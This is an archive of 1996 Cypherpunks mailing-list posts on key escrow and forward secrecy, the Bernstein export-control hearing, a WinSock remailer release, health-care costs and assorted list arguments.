GAK Message-ID: <199609182148.WAA00346@server.test.net> This is along the lines of a technical monkey-wrenching of GAK: 1) The state of email encryption If the NSA decides they would like to get a decrypt of an email that you sent, they turn up with a copy of the encrypted email and request that you decrypt it. The reason that this is so bad is that you have effectively secret shared your plaintext between the NSA (who has archived all of your encrypted email), and yourself who still has they key. This is not in your interests. 2) Mandatory GAK In a future with mandatory GAK, the NSA has all your keys already, because they have a nice database of them, and so they can decrypt any thing they feel like. 3) Monkey-wrenching Even with GAK, where you are forced to give the government the keys, you can do much to make the job of administering GAK very expensive. You start by ensuring that the government can not get your encrypted data (the other half of the secret share), so that the key is of no use :-) You can do this by using a forward secret protocol such as Diffie-Hellman to exchange data, then you can't provide the encrypted text to the NSA even if you want to. But won't they make forward secret protocols illegal at the same time as enforcing GAK? Well, maybe they've left it too late already, consider: IP security layers in general - they provides an extra layer of encryption that the NSA has to obtain the keys for to make sense of their tap. They may have to archive impossible amounts of IP traffic if they can't recognize the type of IP traffic through the IP level encryption (www traffic has its uses as cover traffic :-) IP security layers which use Diffie-Hellman: forward secrecy means that the site owners can't decrypt old IP traffic even if they want to. When using an IP security layer, email delivered via SMTP will be transparently sent over an encrypted link with a random symmetric encryption key negotiated with DH. So the NSA can't get your encrypted email so the fact that they have the decryption key doesn't help them. Even if the NSA had access to the signatory keys used to authenticate DH key negotiation, this means that they still have to do an active MITM attack on the link. This is not something they can do after the fact. Bang goes the ability to archive it all and present it to people afterwards for decryption. Also the expense and complexity of fishing expeditions become impractical. To do a successful MITM attack, the NSA must also subvert the authentication key infrastructure, and hope that no one uses a subliminal, or out-of-band channel to verify the authentication. The above arguments, depending on how quickly things like John Gilmore's S/WAN are deployed, will quickly reduce the Governments options to: attempting to revoke de facto international standard internet protocols after the fact requesting the authentication keys used to sign DH negotiations, so that they can do MITM attacks, and get an IP packet modification infrastructure built (something significantly harder, and more expensive than the digital telephony bill which is still floundering at an estimated $4Bn) So, to monkey wrench GAK, be an early adopter of IP link level security, make sure that everybody is using link level security with forward secrecy, long before Clipper IV gets forced into use as a voluntary, or possibly later mandatory scheme. Adam -- #!/bin/perl -sp0777i Duncan Frissell wrote: >Canada has the world's second most expensive system (after ours) and I > think is a bit closer to 80% of our per cap expenditures. [...] >Canadian costs have risen at approx the same rate as ours. Thanks for the figures and historical background. I'll keep trying to verify the figures I cited, but I see no reason to disagree with you. > Interestingly, even though government expenditures here are 60% of the > total, per cap government expenditures on health care are higher here > than in the UK under the Nattie Health. This is a surprise. I guess it would also be an example. >Course Canada lost it when smuggling defeated the high tax levels on >cigarettes. This will be more of a problem in the future as more efficient >markets enable more smuggling. At present, provinces west of Ontario have not dropped taxes, while Ontario, Quebec and New Brunswick dropped them significantly (+50%). The drop had a predictably negative effect on the smuggling, although due to the rapid increase in smoking rates among adolescents pressure is mounting to increase the taxes again. Most systems have undesired side-effects (e.g. remailers and spam). But if you can keep second order effects from becoming first order, you're heading in the desired direction. Ciao, James From mthompso at qualcomm.com Wed Sep 18 19:54:55 1996 From: mthompso at qualcomm.com (Michelle Thompson) Date: Thu, 19 Sep 1996 10:54:55 +0800 Subject: Assassination Politics, is now Mercenarial Stuff Message-ID: <2.2.32.19960918210414.00333c18@strange.qualcomm.com> Michelle (me) Wrote: >> I believe that with the breakdown of the traditional sense of sovereignty, >> mercenary activity, whether military or commercial in nature, will increase. >> Engineering seems to be quite mercenary already, and very international. >> Marketing and advertising, to a novice (me), seem to be going the same way. At 04:40 PM 9/17/96 -0500, you wrote: >Depends on what you would qualify as being mercenary work, Would Americans >working on North Sea oil platforms getting paid $70,000+ a year tax free >be considered a mercenary? Yes. Reason: A mercenary is generally held to be someone that serves merely for wages or the adventure. (or taking the narrow definition, a soldier hired into foreign service.) Working on a North Sea oil platform seems to be something done primarily for the wages and/or the adventure. However, the qualification is to what degree does that American depend on the organization operating the rig? Just a little bit? Mercenary. A lot? Employee. The distinction between mercenary and employee, to me anyways, is directly related to the level of dependence the individual has on the group that's paying him/her. >Or going down to the islands and opening a data haven? Yes. Reason: This is much closer to pure mercenary than the former example. This is truly free-lance. There is no oil company paycheck nor is there day-to-day direction in what should or could be done that day at the data haven. However, you are under the influence of the legalities of the island, no? You stand a chance of being assimilated into the legal culture. Your data haven could become an institution, and therefore become used as an extension of that island's political presense. All very intriguing. >Or maybe being the engineer for the Sultan of Brunei? No, not really. In taking the "position" of engineer, you fall into the role of foreign consultant rather than mercenary. You are assimilated to a degree that would preclude the independence enjoyed by the mercenary. Contract for a "project" for the Sultan of Brunei, and yes, mercenary you could then be. >Hired Gun Since 1992! Wow. -Michelle From pjb at ny.ubs.com Wed Sep 18 19:59:23 1996 From: pjb at ny.ubs.com (pjb at ny.ubs.com) Date: Thu, 19 Sep 1996 10:59:23 +0800 Subject: nt 3.51 file encryptor Message-ID: <199609182131.RAA07170@sherry.ny.ubs.com> i need a good file encryption routine to run under NT 3.51. the eaiser to use the better, since this will be used by people who otherwise can't spell encryption. public domain or 3rd party. cheers, -paul From wombat at mcfeely.bsfs.org Wed Sep 18 20:01:16 1996 From: wombat at mcfeely.bsfs.org (Rabid Wombat) Date: Thu, 19 Sep 1996 11:01:16 +0800 Subject: All Bets Off In-Reply-To: <9609171918.aa03723@deepthought.armory.com> Message-ID: On Tue, 17 Sep 1996, Jeff Davis wrote: > > Just so this isn't hanging in cyberspace forever, my $5,000 bet for > > anyone to prove the TWA 800 flight was downed by a U.S. missile is now > > *off the table*. > > I heard through the family grapevine that they have pictures of a Stinger > taking out the plane they're analyzing in the Pentagon. There are 220+ > Stingers *missing* in the US, so its not like they have to smuggle them > in... (That's not proof by any means, but *my* family grapevine has always > been very reliable. The cousin who told me this has a Dad who flew as > the intelligence officer observer on Bronco flights out of Quang Tri for > 18 months, rotating out just before the base was over run in May of '72.) Does this cousin also have an aunt who lived next door to Joe Montana's babysitter? I might know his father ... Ask your family grapevine about the stinger's op altitude, and the altitute of the TWA when it broke up - I don't have Jane's lying around, but it seems that the TWA plane was a tad bit high for a stinger. - r.w. From jgrasty at gate.net Wed Sep 18 20:01:48 1996 From: jgrasty at gate.net (Joey Grasty) Date: Thu, 19 Sep 1996 11:01:48 +0800 Subject: WinSock Remailer Version ALPHA 1.3 Now Available Message-ID: <199609182346.TAA136362@osceola.gate.net> -----BEGIN PGP SIGNED MESSAGE----- Y'all: Version ALPHA 1.3 of the WinSock Remailer is now available at Lance Cottrell's Export Controlled Crypto Site at: http://www.obscura.com/crypto.html After you get past the crypto control and into ftp site, look in the DOS directory for the file WSA13.ZIP. You can find more information on my webpage at: http://www.c2.net/~winsock/ which I will be updating tonight. What's new in this release: - -------------------------- 1) Support for e-mail accounts that are "Shared" or "Exclusive". This function allows a remailer operator to share a personal e-mail account with the remailer. The way this function works is that messages without valid remailer headers are NOT deleted from the mail spool file (the file where your messages are stored at your Internet Service Provider). Instead, the remailer only deletes messages with valid remailer headers from the mail spool, allowing another e-mail client (such as Eudora or Pegasus Mail) to retrieve the non-remailer messages. If the e-mail account is "Exclusive", the remailer will download all messages from the mail spool file and delete them automatically. Note that if you use the "Shared" function, you should always operate the remailer FIRST, and then your e-mail client. This way, the remailer removes the remailer messages, leaving the personal messages (and improperly formatted remailer messages) for your e-mail client to process. You will have to halt the remailer while using your e-mail client. If, for some reason, you manage to download a message meant for the remailer, simply save it to a file (in ASCII format) with a filename of the form INxxxxxx.yyy, where: xxxxxxx is a six-digit number (doesn't matter what number) yyy is a three-digit number (doesn't matter what number) and save it to the INMAIL directory. Make sure there is no other message with that filename so that you won't overwrite an existing message. The remailer will process the message normally on the next batch. You will probably want to kill all rejected messages, as each batch of messages that are processed will download each non-remailer message every time. Set the remailer to KEEP rejected messages until you feel comfortable with the remailer's operation, so you can recover any personal messages in the REJECT directory, if there is a problem with the remailer. 2) Support for message pool size on the Outgoing Mail dialog box. I recommend that the pool size be set to 3 for lightly used remailers (less than 100 messages per day) and 5 to 10 for heavily used remailers. 3) PGP only operation now works properly. 4) Separate secret key ring file for the remailer's key now works properly. The key file must be located in the PGP directory and only the filename should be used in the edit box on the PGP Options dialog box (the path is automatically appended to the filename). 5) The rare problem of the remailer locking up while retrieving messages from the POP server has been fixed. 6) Messages with subject help are now accepted along with remailer-help, to send the remailer help file. Features not yet implemented and known problems: - ----------------------------------------------- 1) Latent-Time is not operational; the header is ignored. 2) Message size limit is not implemented. 3) Help file is not implemented. Use my webpage at: http://www.c2.net/~winsock/setup.html instead. 4) Hard coded IP addresses are not supported. 5) Message reordering for NNTP is not supported yet. 6) The remailer does not work under WinNT or Win95 yet. 7) The remailer does not operate with the Netcom winsock. 8) If the remailer does not have enough memory to run the PGP task in a DOS window, the PGP decryption will fail and the message will be lost. Test a few messages before allowing the remailer to run unattended. 9) Occasionally, the remailer timing out on SMTP or POP3 will cause Free Agent (the newsreader) to disconnect from the news server when using the Internet-In-A-Box WINSOCK. Netscape and Private Idaho also cause this problem, so I am unsure if this is a problem with the remailer or with the WINSOCK. 10) Getting the addresses in the From: and Request-Remailing-To: header lines is weak (requires only that an "@" be present for the address to be assumed valid. Addresses without an "@" sign will be rejected. 11) Loading the WINSOCK.DLL and dialing does not work with Internet-In-A-Box dialer. Trumpet may work, but has not been tested recently. I will retest with Trumpet in a few days. The remailer has not been tested with any other WinSocks. If you find any that work or don't work, please let me know. 12) Debugging messages in DEBUG.ASC file in the LOG subdirectory are cryptic. Generally, timeouts are caused by the server not responding within 60 seconds. 13) Daylight savings time in the Date: header is not yet supported (it will always use standard time). 14) On rare occasions, long messages are sometimes munged. I've been working on this one for weeks, and still don't know why. Installing the WinSock Remailer: - ------------------------------- 1) Create a directory where you want the remailer code to reside, for example, C:\REMAILER. You should have at least 10-20 MB of free disk space on the drive where the remailer will operate. 2) Unzip the file WSA13.ZIP into the directory you just created. You will find three files, WSRMA12.ZIP, this file README.TXT and WSRAM13.SIG. WSRMA13.SIG is the detached signature file for WSRMA13.ZIP. Verify the signature using PGP and my key found on my homepage at http://www.c2.net/~winsock. 3) You will find the following files in WSRMA13.ZIP: Length Method Size Ratio Date Time CRC-32 Attr Name ------ ------ ----- ----- ---- ---- -------- ---- ---- 219648 Implode 107495 52% 11-17-94 04:50 d2386b5d --w- BC450RTL.DLL 164928 Implode 50249 70% 02-28-95 11:14 060f476f --w- BWCC.DLL 283 Shrunk 220 23% 08-04-96 17:41 eff2eab1 --w- COMMENT.ASC 34 Stored 34 0% 08-04-96 17:44 5400f517 --w- DEST.BLK 1310 Implode 731 45% 09-16-96 23:49 7049ba29 --w- HELP.ASC 232 Shrunk 194 17% 08-04-96 17:43 84f570bc --w- KEY.ASC 4846 Implode 2609 47% 08-13-96 21:37 f8aacb35 --w- LICENSE.TXT 266538 Implode 98828 63% 09-16-96 23:42 80b5a398 --w- REMAILER.EXE 17 Stored 17 0% 08-04-96 17:44 28dedbf6 --w- SOURCE.BLK 545 Implode 179 68% 08-27-95 10:59 d85b6f8e --w- WRPGP.PIF ------ ------ --- ------- 658381 260556 61% 10 4) Move the files BWCC.DLL and BC450RTL.DLL into your Windows system directory (usually C:\WINDOWS\SYSTEM) only if: a) you don't already have these two files, OR b) the dates on the two files in your system directory have dates earlier than those shown above. If you already have the same or later dated files, delete these two files. 5) Move the file WRPGP.PIF into your PGP directory (you should have installed PGP before installing the remailer), usually C:\PGP. Make sure the environment variable PGPPATH points to your PGP directory. 6) Edit the file COMMENT.ASC to customize the headers of messages sent by your remailer. You will want to include information on where to send complaints and blocking requests, and a pointer to your remailer's home page, if any. 7) Edit HELP.ASC for specific help information on how to use your remailer. This file will be sent to users of your remailer if you enable remailer-help on the Options Dialog Box. You should include information on which options you are using with your remailer. 8) Edit KEY.ASC to insert your remailer's PGP public key. 9) Edit SOURCE.BLK (source address blocking file) and DEST.BLK (destination address blocking file) for any addresses you want to block. I recommend you block "whitehouse.gov" to make sure no one uses your remailer to threaten the President, which is a federal crime. Each address must go on a separate line. 10) Create a "Program Item" that you will use to startup the remailer from the Windows Program Manager. Do this by selecting the Group that you want to put the WinSock Remailer into and then selecting File | New from the Program Manager. Make sure that the Working Directory points to the directory where REMAILER.EXE resides. 11) Once you have done all of the above instructions, you can now run the remailer for the first time. Open all of the dialog boxes under the Setup Menu and fill out all of the items. See the WinSock Remailer Setup Page at http://www.c2.net/~winsock/setup.html for more details. 12) Once everything is setup properly, you can now run the remailer. Use Private Idaho to send the remailer some test messages and verify that the operation of the remailer is successful. You will probably want to turn on logging so that you can debug any problems with your remailer setup. If you have any problems or questions, send me a note at jgrasty at gate.net and I will get back to you as soon as I can. You can find additional information on my webpage at http://www.c2.net/~winsock/. See also the release notes at http://www.c2.net/~winsock/relnote.html. Since this is alpha software, you may encounter some problems. Specifically, I need to know if you have success with any of the following untested configurations: a) Windows 95 (now known not to work) b) Windows NT (now known not to work) c) Any WinSock other than Internet-In-A-Box or Trumpet WinSock. d) Any version of PGP other than 2.6.2. If you do find a problem, give me detailed information on your computer's configuration, such as version of Windows, Winsock, amount of memory, which version of PGP, etc. Good luck, Joey Grasty jgrasty at gate.net -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQB1AwUBMkCJNsODO2V89BZZAQGpSgL/bfB+K6kZsguHIWlmOdzkQiU/sJHYYFZN XMwyvt+CXyuQX3nCIwHEkWglFIly+9+FUHfD49McTuBAx0E/EyfuiQbS4XkiSsym 6r/B4kBv3w9Tv54p19LnsApSH4YjGHMX =4XOe -----END PGP SIGNATURE----- -- Joey Grasty jgrasty at gate.net [home -- encryption, privacy, RKBA and other hopeless causes] jgrasty at pts.mot.com [work -- designing pagers] "Anyone who considers arithmetical methods of producing random digits is, of course, in a state of sin." -- John Von Neumann PGP = A7 CC 31 E4 7E A3 36 13 93 F4 C9 06 89 51 F5 A7 From alexlh at yourchoice.nl Wed Sep 18 20:04:45 1996 From: alexlh at yourchoice.nl (Alex Le Heux) Date: Thu, 19 Sep 1996 11:04:45 +0800 Subject: Spam blacklist project In-Reply-To: <9609182121.AA13495@vesuvius.ai.mit.edu> Message-ID: On Wed, 18 Sep 1996 hallam at vesuvius.ai.mit.edu wrote: > > Not impressed by their setup, there does not seem to be any checking > to see if the mail address is correct (ie to checlk for a denial of > service attack) and the setup requires distributors to submit their > list for "washing". That type of setup may be OK for the bush league > but its hardly cypherpunk type stuff. Its fairly easy to set up a scheme > in which the blacklist can be distributed with no risk to the > subscribers. Simply use a SHA digests and so on. > I didn't say it was their setup was the setup to end all spams :) But I never really gave it much thought. It shouldn't be to complicated to set some up like you describe though. > I hadn't checked on Yahoo, I tend to use Alta-Vista having found > Yahoo somewhat arbitary in category definition. > I usually check on Yahoo first. Alta-Vista always comes back with such an enourmous amount of links. > > PS Sites that use red text on a white background ... ugh!!! > Ah well... Some people never learn :( Cheers, Alex /// I dabble in techno-house and sometimes, /// I do that badass hip-hop thang... /// But the F U N K gets me every time! From dlv at bwalk.dm.com Wed Sep 18 20:10:48 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Thu, 19 Sep 1996 11:10:48 +0800 Subject: 56 kbps modems In-Reply-To: <199609181248.IAA06860@sherry.ny.ubs.com> Message-ID: pjb at ny.ubs.com writes: > if nothing else, the availability of 56kbps on an analog line might get the > telcos to bring the isdn prices down to some reasonable level, which at the m > it is not, at least not in nyc. In NYC one has to pay 1c/minute/channel for using ISDN, even for a local call, which comes out to $1.20/minute for the 2 channels most people have. It worse than most Western states, with no per minute charges. It's better than Connecticut, where it costs $6/hour. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From gnu at toad.com Wed Sep 18 20:11:20 1996 From: gnu at toad.com (John Gilmore) Date: Thu, 19 Sep 1996 11:11:20 +0800 Subject: Bernstein hearing: The Press Release Message-ID: <199609182103.OAA22863@toad.com> CRYPTO FACE-OFF AT HIGH-NOON Judge Patel to Decide if Government Restrictions on Cryptography Violate the First Amendment September 18, 1996 Electronic Frontier Foundation Contacts: Shari Steele, Staff Counsel 301/375-8856, ssteele at eff.org John Gilmore, Founding Board Member 415/221-6524, gnu at toad.com Cindy Cohn, McGlashan & Sarrail 415/341-2585, cindy at mcglashan.com San Francisco, CA -- On Friday, September 20, 1996, Judge Marilyn Hall Patel will hold hearings in a case with far-reaching implications for personal privacy, U.S. competitiveness, and national security. Mathematician Daniel J. Bernstein, a Research Assistant Professor in the Department of Mathematics, Statistics and Computer Science at the University of Illinois at Chicago, has sued several Federal agencies on the grounds that the agencies' requirement that he obtain a license prior to publishing his ideas about cryptography violates his First Amendment right to freedom of speech. Cryptography is the science of secret writing. It is the technology to use for providing privacy or proving authenticity over distances. All kinds of communications, from cellular phones to corporate or government databases, depend on cryptography for protection. The security of computers against intruders, the privacy and integrity of the Internet, ATM machines, satellite and cable TV, and the world financial networks all depend on cryptographic protection. In fact, the very future of the global Internet, especially as a tool for commerce, political organizing and scientific development of new ideas, depends upon the availability of strong encryption. The U.S. government has restricted cryptography since it was useful in winning World War II. However, cellular telephones, satellites, ATM machines, and the Internet did not exist in 1945; advances in communication and cheap computation have made cryptography useful in many new applications. In addition, strong encryption is already available abroad, making laws restricting their export obsolete and damaging the ability of U.S. businesses to compete in overseas markets. In fact, Congress is currently considering three pieces of legislation that would all update the export control laws and remove encryption from its current place on the U.S. Munitions List. While Washington toils with Pro-CODE and the other introduced bills, this hearing will examine the various legal tests that will determine whether the export laws and regulations (the "ITAR") are constitutional. Professor Bernstein argues that they violate the First Amendment in several different ways: LEGAL ARGUMENTS * Any legal framework that allows a government bureaucrat to censor speech before it happens is an unconstitutional prior restraint. The government is not allowed to set up such a drastic scheme unless they can prove that publication of such information will "surely result in direct, immediate, and irreparable damage to our Nation or its people" and that the regulation at issue is necessary to prevent this damage. The government must also tightly restrain the discretion given to the bureaucrats to ensure that they don't misuse this power. The government has not met this burden regarding the ITAR legal framework. * Because restrictions on speech about cryptography are based on the content of what is being said, the court must apply a strict scrutiny test to determine whether individuals can be punished for engaging in this speech. This requires that the regulation be necessary to serve a compelling state interest and that it is narrowly drawn to achieve that end. The ITAR regulatory scheme has adopted a too- restrictive approach, by prohibiting many forms of speech in the area of cryptography. * The ITAR regulatory framework lacks the necessary procedural safeguards. Grants of administrative discretion must be limited by clear standards, and judicial review must be available. "Quite simply, the ITAR Scheme allows its administrative agencies to make inconsistent, incorrect and sometimes incomprehensible decisions censoring speech, all without the protections of judicial review or oversight." * The ITAR framework is unconstitutionally vague. The government doesn't even seem to know what its regulations include and exclude! Here, they told Professor Bernstein that he could not publish his academic paper for over three years, only changing their collective mind and withdrawing that decision after being sued. The lack of standards has allowed the government to misuse a statute aimed at commercial, military arms sales to limit academic and scientific publication. * The ITAR regulatory scheme is overbroad. In an internal memo written almost 20 years ago, the government's own Office of Legal Counsel concluded that the ITAR's licensing standards "are not sufficiently precise to guard against arbitrary and inconsistent administrative action." The OLC specifically warned that the coverage was so broad it could apply to "communication of unclassified information by a technical lecturer at a university or to the conversation of a United States engineer who meets with foreign friends at home to discuss matters of theoretical interest." This is exactly what is happening here, and it is unconstitutional. Judge Patel will hear arguments from attorneys for Bernstein and the government concerning their respective motions for summary judgment. The hearing on Friday is scheduled for 12:00 noon at the United States District Court for the Northern District of California, San Francisco Headquarters, at 450 Golden Gate Avenue. The hearing is open to the press and to the public. CASE BACKGROUND Bernstein completed the development of an "encryption algorithm" (a recipe or set of instructions) he calls "Snuffle." In order to contribute Snuffle to the marketplace of scientific ideas, and to allow other scientists to evaluate and test his ideas, Bernstein wishes to publish (a) a paper in English describing and explaining the algorithm, (b) the "source code" for a computer program that uses the algorithm (this source code more precisely describes and implements the idea), and (c) instructions for how a person could use the source code and a computer to encrypt communications. He wishes to publish them in print journals as well as on the Internet. Bernstein also wishes to discuss these items at mathematical conferences, in college classrooms, on the Internet, and in other open, public meetings. In fact, he would like to use Snuffle as part of his course material for a cryptography class he will be teaching next spring. The Arms Export Control Act and the International Traffic in Arms Regulations (the ITAR regulatory scheme) required Bernstein to submit his ideas about cryptography to the government for review, to register as an arms dealer, and to apply for and obtain from the government a license to publish his ideas. Failure to do so would result in severe civil and criminal penalties. Bernstein believes this is a violation of his First Amendment rights and has sued the government. In the first phase of this litigation, the government argued that since Bernstein's ideas were expressed, in part, in computer language (source code), they were not protected by the First Amendment. On April 15, 1996, Judge Patel rejected that argument and held for the first time that computer source code is protected speech for purposes of the First Amendment. Because of its far-reaching implications, the Bernstein case is being watched closely by privacy advocates, the computer industry, the export and cryptography communities, and First Amendment activists. In fact, several members of these communities provided declarations that were submitted in support of Bernstein's motion. ABOUT THE ATTORNEYS Lead counsel on the case is Cindy Cohn of the San Mateo law firm of McGlashan & Sarrail, who is offering her services pro bono. Major additional pro bono legal assistance is being provided by Lee Tien of Berkeley; M. Edward Ross of the San Francisco law firm of Steefel, Levitt & Weiss; James Wheaton and Elizabeth Pritzker of the First Amendment Project in Oakland; and Robert Corn-Revere of the Washington, DC, law firm of Hogan & Hartson. ABOUT THE ELECTRONIC FRONTIER FOUNDATION The Electronic Frontier Foundation (EFF) is a non-profit civil liberties organization working in the public interest to protect privacy, free expression, and access to online resources and information. EFF is a primary sponsor of the Bernstein case. EFF helped to find Bernstein pro bono counsel, is a member of the Bernstein legal team, and helped collect members of the academic community and computer industry to support this case. Full text of the lawsuit and other paperwork filed in the case is available from EFF's online archives at http://www.eff.org/pub/EFF/Policy/Crypto/ITAR_export/Bernstein_case/ From seans at pobox.com Wed Sep 18 20:18:12 1996 From: seans at pobox.com (Sean Sutherland) Date: Thu, 19 Sep 1996 11:18:12 +0800 Subject: Snake-Oil FAQ Message-ID: <19960918235435406.AAB287@maverick> -----BEGIN PGP SIGNED MESSAGE----- To: wendigo at pobox.com, cypherpunks at toad.com Date: Wed Sep 18 18:54:08 1996 > I think a blacklist of that sort is inherently bad. I would much rather > have the public be able to RECOGNIZE SYMPTOMS of snake oil, rather than > just be spoon fed a list of good products vs. bad products. Pardon the > cliche, but if you give a man a fish ... etc, etc. Not only that, but you're also looking at a potential lawsuit, unless such a list were compiled and managed through the use of a nymserver. Since there's no way, within reasonable limits, that a cryptogrpahic program can be proven bad, then a lawsuit is inevitable. I could potentially see a list of products which have "methods which have been proven ineffective in securing data against determined attacks" such as DES, etc., but otherwise, it's just begging for trouble. - --- Sean Sutherland | GCS/C d- s+:+ a--- C+++ V--- P L E- W++ N++ K- w PGP Key ID: E43E6489 | o O-(++) M-- V PS+ PE++ Y++ PGP++(+) t--- 5+++ http://pobox.com/~seans | X++ Rb++ DI+ D+ G e- h! !r y -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBMkCLo1ZoKRrkPmSJAQE9swf/VWCd3++mf2NUPPPd37bW0oHTcz/T2Ft/ PAN/3bf0/NgE/0XxOHZn3DY2a8J5BYUNtnmoqwc/fVo+UQ1sLL8OgYZb/5PMLKtC A4u9IzhNcdg03M5r2n8DltDIsYewiA7NS3IP3/7s9PU/qpsXxS5aa9rSryoB5sLe qPRW97uutrhQD6BREcvVxpmYllYLLXGX9uYxevK99dxpUrNfjKWm/XL3iE2RsF5n 6mERNQXu3yUEEfPpAvIUPXmw9raAhlseBVBY+S4CbhqKRmH8pn6X2ZKeWouo4cPn ZWyyW6CrQJXbX8ARCp8ojI66UgkHCQpNWKIWKwAvTvtoPAT0lSvd+A== =zuPa -----END PGP SIGNATURE----- From dlv at bwalk.dm.com Wed Sep 18 20:18:20 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Thu, 19 Sep 1996 11:18:20 +0800 Subject: Fuckhead In-Reply-To: <199609181408.AA21359@crl11.crl.com> Message-ID: >From varange at crl.com Wed Sep 18 10:09:35 1996 Received: by bwalk.dm.com (1.65/waf) via UUCP; Wed, 18 Sep 96 11:07:01 EDT for dlv Received: from mail.crl.com by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP; id AA17484 for dlv at bwalk.dm.com; Wed, 18 Sep 96 10:09:35 -0400 Received: from crl11.crl.com by mail.crl.com with SMTP id AA03230 (5.65c/IDA-1.5 for ); Wed, 18 Sep 1996 07:10:02 -0700 Received: by crl11.crl.com id AA21359 (5.65c/IDA-1.5 for dlv at bwalk.dm.com); Wed, 18 Sep 1996 07:08:08 -0700 From: Troy Varange Message-Id: <199609181408.AA21359 at crl11.crl.com> Subject: Fuckhead To: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Wed, 18 Sep 1996 07:08:08 -0700 (PDT) Priority: Fuckhead Precedence: Fuckhead Reply-To: dlv at bwalk.dm.com In-Reply-To: X-Mailer: ELM [version 2.4 PL23] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 10 Fuckhead. From frissell at panix.com Wed Sep 18 20:23:18 1996 From: frissell at panix.com (Duncan Frissell) Date: Thu, 19 Sep 1996 11:23:18 +0800 Subject: Risk v. Charity (was: RE: Workers Paradise. /Political. Message-ID: <3.0b19.32.19960918165617.00a19168@panix.com> At 03:44 PM 9/18/96 EST, jbugden at smtplink.alis.ca wrote: >I did not respond to the other poster because it seemed clear that he was not >informed on the subject. While people debate the precise reasons for it, the >Canadian health system spends about two thirds as much as the U.S. system as a >percent of GNP while covering more people as a percent of population. This is a >fact. Canada has the world's second most expensive system (after ours) and I think is a bit closer to 80% of our per cap expenditures. Canada's costs and ours used to track pretty well. When Canada adopted the Provincial Health Systems model in the mid '60s they fell 20% (relative to us -- while our costs were exploding because of Medicare-Medicaid). Since then, Canadian costs have risen at approx the same rate as ours. Per cap expenditures on the uninsured in America are approximately the same as on the insured. As are average number of days in hospital, etc. Most of the uninsured just go to hospitals and don't pay. States have various methods of sharing this cost out. Interestingly, even though government expenditures here are 60% of the total, per cap government expenditures on health care are higher here than in the UK under the Nattie Health. Our system is much more expensive than it has to be because the unrestricted insurance model encourages over consumption. Americans are very assertive about getting what's coming to them. They don't like to wait. They can only be restrained by market pricing. >This is another way to create risk pool seperation as well as reduce health >costs. Some people will not be able to afford tobacco, reducing the potential >candidates for tobacco related illness. The additonal revenue can be used as a >"risk premium" to fund the related long term medical expenses. Course Canada lost it when smuggling defeated the high tax levels on cigarettes. This will be more of a problem in the future as more efficient markets enable more smuggling. >If all you do is replace Big Brother with Big Business, then all that has >changed is the name. GM shoots fewer people than the US Gov. And if they started shooting more people, their cash flow would suffer. People are willing to accept less violence from private institutions, however large, than from governments. In addition, average institutional size is down. Big business is smaller. DCF From jbugden at smtplink.alis.ca Wed Sep 18 20:24:49 1996 From: jbugden at smtplink.alis.ca (jbugden at smtplink.alis.ca) Date: Thu, 19 Sep 1996 11:24:49 +0800 Subject: Risk v. Charity (was: RE: Workers Paradise. /Politica. Message-ID: <9608188430.AA843086679@smtplink.alis.ca> >Black Unicorn wrote: >> jbugden at alis.com wrote: >> But I did site one example of a government >> funded system that *is* less expensive than a market driven one. > >I believe this cite was refuted by another poster, that is if you mean the >Canadian health system. I did not respond to the other poster because it seemed clear that he was not informed on the subject. While people debate the precise reasons for it, the Canadian health system spends about two thirds as much as the U.S. system as a percent of GNP while covering more people as a percent of population. This is a fact. >> >> Not every victim of lung cancer smokes. >> >I'll tell you what. I will give you a dollar for every non-smoking >> >related lung cancer case, if you give me one for every smoking >> >related case. >> >> Agreed, with one condition. I get to create a tax on tobacco products >> and keep this additional revenue. > >Uh, what's your point here? This is another way to create risk pool seperation as well as reduce health costs. Some people will not be able to afford tobacco, reducing the potential candidates for tobacco related illness. The additonal revenue can be used as a "risk premium" to fund the related long term medical expenses. >Markets, however, fail far less often then the left would have us believe. >They also have the rather potent effect of reducing government >involvement in everyday life. I don't speak for the left, nor for the right. I don't think that there is a unified voice on either side of the political spectrum. However I do find it ironic that market driven health insurance has the potential to be more intrusive into personal life than many government systems (cf. genetic screening). If all you do is replace Big Brother with Big Business, then all that has changed is the name. Ciao, James "what are cast as one-sided ... guidelines can be recast beneficially as two-sided trade-offs" - Webb Stacy From paul at fatmans.demon.co.uk Wed Sep 18 20:37:57 1996 From: paul at fatmans.demon.co.uk (paul at fatmans.demon.co.uk) Date: Thu, 19 Sep 1996 11:37:57 +0800 Subject: IBM_gak Message-ID: <842988791.23099.0@fatmans.demon.co.uk> > Apparently, senile Tim May (fart) is a Clinton administration troll planted > here to sabotage any discussions of actual crypto work and to flood this > mailing list with lies and personal attacks and to make it unusable. You would appear to be an accomplice.... Datacomms Technologies web authoring and data security Paul Bradley, Paul at fatmans.demon.co.uk Http://www.fatmans.demon.co.uk/crypt/ "Don`t forget to mount a scratch monkey" -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.3ia mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53 6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3 sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az6JAJUDBRAy NwfvNkCBjDT0xHEBATQPA/9TORmN/UjNecj03q4anpvdyCLiez5sKuNbnYK50RiP Jj4QpWWvST3smyQ0A86DrZY/re056MXwQmARESx0rFZxdnD0oORICl5r8dJLIy3b j8rbA5olXwZwKz73/X5s13v/pvHYX4cIsbVK8NHXqh5llSKt6TBAuGgkIGF29z5k C4kAlQMFEDI3B9mdtf/umVkv7QEBcRYD/1FBteLqsUmr81euxqqnnrpLlyHb58B/ 9sdATuua4uSjX46hXDZ264YozspNrzSB4NEdrmXOWVX3fiE0ga6XkSSkIeF23V90 